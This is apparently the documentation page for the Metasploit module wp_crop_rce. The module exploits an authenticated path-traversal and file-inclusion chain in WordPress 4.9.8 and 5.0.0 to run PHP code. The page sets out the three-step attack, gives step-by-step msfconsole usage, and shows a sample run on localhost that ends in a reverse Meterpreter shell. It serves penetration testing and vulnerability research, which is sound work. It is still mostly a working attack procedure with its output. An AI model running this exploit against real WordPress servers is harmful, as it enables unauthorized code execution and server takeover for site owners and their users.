documentation/modules/exploit/multi/http/wp_crop_rce.md
WordPress 5.0.0 and every release up to and including 4.9.8 allow arbitrary code execution through a core flaw that chains a path traversal with a local file inclusion. An attacker who holds an account with at least author privileges on the target can execute PHP code on the server.
The chain has three steps:

1. Modify the `_wp_attached_file` entry through the `meta_input` `$_POST` array so that it names an arbitrary path.
2. Trigger the `crop-image` WordPress function. Because that path is used when the cropped file is saved, the traversal makes the crop land outside the uploads directory (the module output below shows it being placed in the active theme). The module first checks which image library performs the crop, because the PHP payload embedded in the image has to survive the re-encoding that library applies.
3. Set the `_wp_page_template` value to the cropped image. The post will `include()` the image, which contains PHP code.

Visiting the post created by the attacker then yields code execution.
More details can be found on the RIPS Technologies blog.
Confirm that functionality works:
1. Start msfconsole
2. Do: use exploit/multi/http/wp_crop_rce
3. Do: set RHOST to the target
4. Do: set USERNAME and PASSWORD to an account with at least author privileges
5. Do: set LHOST and LPORT
6. Do: run

Option THEME: the name of the theme WordPress is using. Used only if the theme cannot be auto-detected.
```
msf > use exploit/multi/http/wp_crop_rce
msf exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(multi/http/wp_crop_rce) > set username author
username => author
msf exploit(multi/http/wp_crop_rce) > set password author
password => author
msf exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux
```